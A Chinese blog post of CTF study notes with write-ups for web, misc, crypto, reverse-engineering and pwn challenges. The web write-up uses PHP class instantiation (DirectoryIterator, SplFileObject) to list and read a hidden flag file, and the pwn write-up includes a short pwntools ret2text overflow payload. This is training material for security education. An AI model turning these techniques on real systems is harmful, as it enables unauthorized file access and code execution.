2.14学习记录

最新推荐文章于 2025-05-24 12:01:24 发布
最新推荐文章于 2025-05-24 12:01:24 发布
阅读量338 收藏 7
点赞数 3
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88422349/article/details/145640671
版权

Web

flag直接读取不就行了?

代码审计:

<?php
highlight_file('index.php');
# 我把flag藏在一个secret文件夹里面了,所以要学会遍历啊~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
    echo($f . '<br>');
}
echo new $J1ng($Hong);
?>

题目提示flag藏在secret文件夹里面,要学会遍历,先看明白四个参数是干什么的
K、W是通过POST方式请求并且是通过类的方式创建了一个对象dir
K:可以通过查询php文档找遍历的类。我找到的是DirectoryIterator这个类,所以K传入的就是这个类。
W:一般就先访问根目录 传入 ”/“在这里插入图片描述

根据提示 说flag在secret文件夹里面,所以就直接http://challenge.basectf.fun:29227/?K=DirectoryIterator&W=/secret
可以找到flag文件;从KW中只能得到flag的路径,读取还是需要查询PHP中读取文件的类是什么。经查询可以得到是SplFileObject类。再通过传入刚刚得到的flag文件的路径可以读取flag文件。在这里插入图片描述得到flag的位置,在元素选项中找到flag在这里插入图片描述

misc

watermark

根据名字,不难猜出是水印有关的题目
下载附件后有三个文件,第一个txt文档,根据提示,使用在线工具在这里插入图片描述得到了key1,
第二张图片。使用watermark盲水印工具查看第三个压缩包的密码就是key1和key2,解压后得到txt在里面搜索isctf在这里插入图片描述发现flag

crypto

babyrsa

根据名字就能看出来子是rsa加密
题目:

from Crypto.Util.number import *

flag=b'BaseCTF{}'
m=bytes_to_long(flag)

n=getPrime(1024)
e=65537
c=pow(m,e,n)

print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""

exp:

from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832

phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))

re

BasePlus

拿到附件先查壳,发现没壳在这里插入图片描述用ida打开找到主调函数

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char Str1[2032]; // [rsp+20h] [rbp-FF8h] BYREF
  char v5[2056]; // [rsp+810h] [rbp-808h] BYREF

  _main();
  printf("Try typing something:");
  scanf("%s", v5);
  Encode(v5, Str1);
  if ( !strcmp(Str1, "lvfzBiZiOw7<lhF8dDOfEbmI]i@bdcZfEc^z>aD!") )
    printf("Wow, you actually got the flag");
  else
    printf("Maybe you need to try again?");
  return 0;

发现对字符串进行了encode处理在这里插入图片描述这里发现对字符串进行了异或处理,再向上去发掘

  v4 = v17;
    v5 = 4i64;
    v6 = 0i64;
    v7 = 0;
    do
    {
      v15 = 0;
      v16 = 0;
      if ( v3 > v7 )
      {
        v10 = v7 + 1;
        v11 = 1i64;
        do
        {
          v7 = v10;
          *(&v14 + v11) = a1[v10 - 1];
          v12 = (int)v11 <= 2;
          v13 = v3 > (int)v10++;
          ++v11;
        }
        while ( v13 && v12 );
      }
      v17[0] = Secret[(unsigned __int8)v15 >> 2];
      v17[1] = Secret[(HIBYTE(v15) >> 4) | (16 * (_BYTE)v15) & 0x30];
      v17[2] = Secret[(v16 >> 6) | (4 * HIBYTE(v15)) & 0x3C];
      v17[3] = Secret[v16 & 0x3F];
      v8 = v6;
      do
      {

这一坨用ai分析了一下是base64加密,而且是换表的,根据secret数组进行加密,那么就可以分析出思路:先将字符异或回去,再根据secret数组进行base64在这里插入图片描述

pwn

Ret2text

一道栈溢出,用ida找一下主调函数在这里插入图片描述这道题不需要远程执行,只需要在本地打进去就行了
exp:

from pwn import * 

file = process('./pwn1')
add = 0x04011BB
playload = b'a'*0x20+b'b'*0x08+p64(add)

file.sendline(playload)
file.interactive()

打通后就可以得到flag了

醉暮天
关注
2.14_C++.docx
03-26
C++是一种强大的面向对象编程语言,它在编程领域有着广泛的应用。以下是对C++的一些关键知识点的详细说明: ...深入学习还包括模板、异常处理、STL(标准模板库)、智能指针、RAII(资源获取即初始化)等高级主题。
2022年最全的java学习笔记必看.docx
11-04
Java学习笔记 Java学习笔记是Java学习者的必备手册,本笔记涵盖了Java技术基础、Java语言基础、Java开发环境配置等多方面的知识点,旨在帮助学习者快速掌握Java技术。 一、 Java技术基础 1.1 编程语言 Java是一种...
2.14学习笔记
weixin_54260215的博客
02-14 1704
在进行冒烟测试,冒烟测试通过(如果冒烟失败,就打回版本),就进行sit1系统集成测试,将所有测试用例都执行一遍;进行第二次sit系统集成测试,也要冒烟测试,冒烟测试以后就开始进行sit2系统集成测试,测试中发现的bug,提交给开发,开发修改,再提交第三次代码包,进行第三sit系统集成,以此类推,直到测试用例100%执行,0bug(达到测试准出),输出测试报告;(2)sit测试(系统集成测试), 技术测试(it测试);uat测试(验收测试)项目经理,产品经理,开发经理,开发,测试经理,测试、运维等。
2.14学习
Sean_summer的博客
02-15 550
打开环境,只看到一句话要本地访问,先bp抓包,然后改ip为127.0.0.1(fakeip)然后发送repeater,拿到了flag。
2.14学习记录 this关键字 static关键字
trh_csdn的博客
02-19 104
1.this关键字: (1)作用:调用本类属性,调用本类方法,表示当前对象 1)很多时候会出现方法参数和属性名称重复的情况,所以要用this.属性的形式明确地指出要调用的是类中的属性而不是方法的参数。 2)除了访问类中的属性外,也可以进行类中方法的调用,调用本类普通方法,可以使用this.方法(),调用本类构造方法,在一个构造中要调用其他构造,可以使用this()调用。 3)this关键字...
CSS学习笔记2.14
qq_54546580的博客
02-14 78
CSS用于美化HTML
吴恩达深度学习课程第一课2.14-2.18学习笔记
qq_41883520的博客
08-05 131
8月5日学习笔记向量化logistics回归的梯度输出python中的广播关于python_numpy向量的说明logistics损失函数的解释 向量化logistics回归的梯度输出 这是梯度下降的一次迭代。 其他次数还是得使用for循环。 python中的广播 通过复制N次或M次来达到可以进行运算的标准 关于python_numpy向量的说明 用下面的方式创建向量 logistics损失函数的解释 单个训练样本的损失函数表达式推理过程 ...
MySQL学习笔记2.14
A cold winter的博客
02-14 159
查看警告信息 SHOW warning; AUTO_INCREMENT 自动编号,且必须与主键组合使用,但主键不一定都要用AUTO_INCREMENT; 默认情况下,起始值为一,每次的增量为一 PRIMARY KEY 主键约束,每张数据表只能存在一个主键,主键保证记录的唯一性,主键自动为NOT NULL; UNIQUE KEY 唯一约束,唯一约束可以保证记录的唯一性,唯一约束的字段可以为N...
2ED2410学习笔记
daizhifeng123468的博客
04-25 2038
最近的工作遇到了英飞凌得2ED2410芯片,写一篇笔记记录学习过程2ED2410-EM具有输入CPP和CPN的电压比较器。该比较器可用于触发基于任何模拟电压的SAFESTATE模式,甚至是外部电压2ED2410-EM。CPP是比较器的正输入,CPN是负输入。Vcpref可以由微控制器调节,也可以由板载电源芯片(如英飞凌SBC)或简单的分压器固定,在Vcp(REF)的限制内保持稳定。使用该比较器允许2ED2410-EM进入SAFESTATE并独立于微控制器关闭MOSFET。
2.14数据结构与算法学习日记
weixin_64589886的博客
02-14 837
很久以前,魔界大旱,水井全部干涸,温度也越来越高。为了拯救居民,夜叉族国王龙溟希望能打破神魔之井,进入人界“窃取”水灵珠,以修复大地水脉。可是六界之间皆有封印,神魔之井的封印由蜀山控制,并施有封印。龙溟作为魔界王族,习有穿行之术,可任意穿行至任何留有空隙的位置。然而封印不留有任何空隙!龙溟无奈之下只能强行破除封印。破除封印必然消耗一定的元气。为了寻找水灵珠,龙溟必须减少体力消耗。他可以在破除封印的同时使用越行术。
竞赛笔记例2.14
zhdjshebaj的博客
08-14 60
竞赛笔记例2.14
lenovo_energy_management_8.0.2.14
04-18
3. **智能模式**:通过学习用户的使用习惯,软件能自动调整电源策略,比如在长时间未操作时自动进入休眠或待机状态,从而减少不必要的电能消耗。 4. **更新与支持**:联想电源管理软件通常会定期更新,以适应新硬件...
Android内存调优学习总结(OOM与ANR)
2301_80329517的博客
05-23 794
OOM和ANR学习总结
香橙派3B学习笔记2:Vscode远程SSH登录香橙派_权限问题连接失败解决
最新发布
NULL指向我的博客
05-24 663
Vscode下载插件,ssh远程登录香橙派。
Unity基础学习(六)Mono中的重要内容(2)协同程序
m0_74212916的博客
05-22 862
本文简单介绍了Unity中的协同程序
C 语言学习笔记(指针1)
m0_53459880的博客
05-20 1159
*概念:**变量在程序运行中的存在时间(内存申请到内存释放的时间)根据变量存在的时间不同,变量可分为**静态存储方式和动态存储方式**数据类型 * 变量列表;int a;// 普通变量,拥有真实的数据存储空间//正确写法int *p1;int *p2;//错误写法指针变量的值只能是8(32位系统)| 12(64位系统)位的十六进制数。①虽然定义指针变量*a,是在变量名前加上,但是实际变量名依然为a,而不是*a②使用指针变量间接访问内存数据时,指针变量必须要明确指向。
大模型时代,Python 近红外光谱与 Transformer 模型:学习的必要性探究
2403_89974123的博客
05-21 479
在大语言模型盛行的时代,Python近红外光谱技术和Transformer模型仍然具有重要的学习价值。大语言模型如ChatGPT在自然语言处理领域表现出色,但在物质检测与分析方面存在局限。Python近红外光谱技术通过处理近红外光谱数据,广泛应用于食品、制药和农业等领域,提供快速、无损的物质成分检测。Transformer模型则凭借其自注意力机制,在自然语言处理、计算机视觉和时间序列预测等任务中表现出色,并可用于优化近红外光谱分析。二者的结合能够进一步提升物质分析的精度与效率,为科研与产业发展开辟新的道路。
Vue百日学习计划Day43-45天详细计划-Gemini版
LuckyLay的博客
05-20 1005
【代码】Vue百日学习计划Day43-45天详细计划-Gemini版。
GO语言学习(九)
wktomo的博客
05-23 1068
第九期:讲解了数据库接口相关的知识,分析了相关方法接口的实现和学习思路,一步步深入理解相关数据库接口知识
Oracle学习笔记:从基础到高级SQL查询与操作
Oracle学习笔记是一份详尽的文档,主要针对初学者介绍了Oracle数据库的相关知识。这份笔记分为多个章节,从基础知识到高级操作都有涉及。 首先,章节2概述了SQL语言的基础概念,包括SQL的分类,它是一种用于管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值